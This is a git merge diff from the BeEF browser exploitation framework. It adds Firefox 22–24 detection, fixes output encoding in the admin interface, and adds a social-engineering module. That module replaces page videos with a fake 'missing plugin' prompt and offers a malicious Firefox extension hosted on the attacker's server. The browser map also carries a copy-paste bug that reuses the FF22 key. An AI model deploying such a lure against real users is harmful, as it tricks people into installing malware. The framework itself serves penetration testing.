Merge remote-tracking branch 'origin/master'

2013-07-04 20:14:29 +08:00
parent 0b1c753bd3 1bddb00ec8
commit 7e73c0a532
7 changed files with 100 additions and 4 deletions
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -257,7 +257,31 @@ beef.browser = {
     * @example: beef.browser.isFF21()
     */
    isFF21:function () {
-        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && window.navigator.userAgent.match(/Firefox\/21\./) != null;
+        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/21\./) != null;
+    },
+
+    /**
+     * Returns true if FF22
+     * @example: beef.browser.isFF22()
+     */
+    isFF22:function () {
+        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/22\./) != null;
+    },
+
+    /**
+     * Returns true if FF23
+     * @example: beef.browser.isFF23()
+     */
+    isFF23:function () {
+        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/23\./) != null;
+    },
+
+    /**
+     * Returns true if FF24
+     * @example: beef.browser.isFF24()
+     */
+    isFF24:function () {
+        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/24\./) != null;
    },

    /**
@@ -265,7 +289,7 @@ beef.browser = {
     * @example: beef.browser.isFF()
     */
    isFF:function () {
-        return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20() || this.isFF21();
+        return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20() || this.isFF21() || this.isFF22() || this.isFF23() || this.isFF24();
    },

    /**
@@ -695,6 +719,9 @@ beef.browser = {
            FF19:this.isFF19(), // Firefox 19
            FF20:this.isFF20(), // Firefox 20
            FF21:this.isFF21(), // Firefox 21
+            FF22:this.isFF22(), // Firefox 22
+            FF22:this.isFF23(), // Firefox 23
+            FF22:this.isFF24(), // Firefox 24
            FF:this.isFF(), // Firefox any version

            IE6:this.isIE6(), // Internet Explorer 6
@@ -950,6 +977,18 @@ beef.browser = {
            return '21'
        }
        ;    // Firefox 21
+        if (this.isFF22()) {
+            return '22'
+        }
+        ;   // Firefox 22
+        if (this.isFF23()) {
+            return '23'
+        }
+        ;   // Firefox 23
+        if (this.isFF24()) {
+            return '24'
+        }
+        ;   // Firefox 24

        if (this.isIE6()) {
            return '6'
--- a/extensions/admin_ui/media/javascript/ui/panel/DataGrid.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/DataGrid.js
@@ -45,7 +45,7 @@ DataGrid = function(url, page, base) {
 			dataIndex: 'type',
 			sortable: true,
 			width: 60,
-			renderer: function(value, metaData, record, rowIndex, colIndex, store) {
+			renderer: function(value) {
 				return "<b>" + $jEncoder.encoder.encodeForHTML(value) + "</b>";
 			}
 		}, {
@@ -54,7 +54,9 @@ DataGrid = function(url, page, base) {
 			dataIndex: 'event',
 			sortable:true,
 			width: 420,
-			renderer: $jEncoder.encoder.encodeForHTML(this.formatTitle)
+			renderer: function(value){
+                return $jEncoder.encoder.encodeForHTML(value);
+            }
 		}, {
 			id: 'log-date',
 			header: "Date",
--- a/liveCD/BeEFLive.sh
+++ b/liveCD/BeEFLive.sh
@@ -189,6 +189,8 @@ show_menu() {
 			 git stash
 			 git pull
 			 msf="0"
+			 # check for new bundle requirements and update
+		     bundle update
 		fi
 		
 		#
--- a/modules/social_engineering/replace_video_fake_plugin/command.js
+++ b/modules/social_engineering/replace_video_fake_plugin/command.js
--- a/modules/social_engineering/replace_video_fake_plugin/config.yaml
+++ b/modules/social_engineering/replace_video_fake_plugin/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        replace_video_fake_plugin:
+            enable: true
+            category: ["Social Engineering"]
+            name: "Replace Videos (Fake Plugin)"
+            description: "Replaces an object selected with jQuery (all embed tags by default) with an image advising the user to install a missing plugin. If the user clicks the image they will be prompted to download a malicious Firefox extension (by default)."
+            authors: ["Yori Kvitchko", "antisnatchor", "bcoles"]
+            target:
+                user_notify: ['ALL']
--- a/modules/social_engineering/replace_video_fake_plugin/module.rb
+++ b/modules/social_engineering/replace_video_fake_plugin/module.rb
@@ -0,0 +1,24 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Replace_video_fake_plugin < BeEF::Core::Command
+
+  def self.options
+    @configuration = BeEF::Core::Configuration.instance
+    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+    url = 'http://' + beef_host + ':' + @configuration.get("beef.http.port")
+    return [
+        {'name' => 'url', 'ui_label' => 'Plugin URL', 'value' => url+'/api/ipec/ff_extension', 'width'=>'150px'},
+        {'name' => 'jquery_selector', 'ui_label' => 'jQuery Selector', 'value' => 'embed', 'width'=>'150px'}
+    ]
+  end
+
+  def post_execute
+    content = {}
+    content['Result'] = @datastore['result']
+    save content
+  end
+
+end
--- a/modules/social_engineering/replace_video_fake_plugin/plugins-required.png
+++ b/modules/social_engineering/replace_video_fake_plugin/plugins-required.png